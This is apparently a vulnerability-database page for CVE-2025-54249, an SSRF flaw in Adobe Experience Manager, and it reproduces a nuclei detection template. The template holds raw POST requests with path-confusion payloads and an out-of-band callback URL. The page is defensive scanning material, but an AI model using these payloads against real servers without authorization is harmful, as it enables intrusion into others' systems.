CVE-2025-54249: Adobe Experience Manager ≤ 6.5.23.0 – SSRF

日期: 2025-08-01 | 影响软件: Adobe Experience Manager | POC: 已公开

漏洞描述

Adobe Experience Manager versions 6.5.23.0 and earlier are affected by a Server-Side Request Forgery (SSRF) vulnerability that could result in a Security feature bypass

PoC代码[已公开]

id: CVE-2025-54249

info:
  name: Adobe Experience Manager ≤ 6.5.23.0 – SSRF
  author: DhiyaneshDk,assetnote
  severity: medium
  description: |
    Adobe Experience Manager versions 6.5.23.0 and earlier are affected by a Server-Side Request Forgery (SSRF) vulnerability that could result in a Security feature bypass
  reference:
    - https://github.com/assetnote/hopgoblin/blob/main/hopgoblin.py
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54251
    - https://helpx.adobe.com/security/products/experience-manager/apsb25-90.html
  metadata:
    verified: true
    max-request: 6
    vendor: adobe
    product: experience_manager
    fofa-query: body="/libs/granite/core/content/login.html"
  tags: cve,2025,adobe,aem,ssrf,oast,oob,vkev,vuln

http:
  - raw:
      - |
        POST /services/accesstoken/verify;x='.pdf/x' HTTP/1.1
        Host: {{Hostname}}
        User-Agent: hopgoblin/1.0
        Accept-Encoding: gzip, deflate, br
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Connection: keep-alive
        Cache-Control: max-age=0
        Sec-Ch-Ua: "Google Chrome";v="139", "Not=A?Brand";v="8", "Chromium";v="139"
        Sec-Ch-Ua-Mobile: ?0
        Sec-Ch-Ua-Platform: "macOS"
        Accept-Language: en-US;q=0.9,en;q=0.8
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        Content-Type: application/x-www-form-urlencoded

        auth_url=https%3A%2F%2F{{interactsh-url}}

    payloads:
      path:
        - "/services/accesstoken/verify;x='.pdf/x'"
        - "/services/accesstoken/verify;x='.ico/x'"
        - "/services/accesstoken/verify;x='.html/x'"
        - "/services/accesstoken/verify;x='.css/x'"
        - "/services/accesstoken/verify;x='x/graphql/execute/json/x'"
        - "/graphql/execute.json/..%2F../services/accesstoken/verify"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_any(body,'<html')"
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "http"

    extractors:
      - type: dsl
        dsl:
          - 'interactsh_protocol'
          - 'interactsh_request'
# digest: 4a0a00473045022039d2939b84185aa28e0b4990e599da188e4808a6af813171d4a54dfd742622550221009b8815b355e4a9eff046714a979ddb115363e90de10330ec6f0e436c3f6f76ae:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-54249.yaml

相关漏洞推荐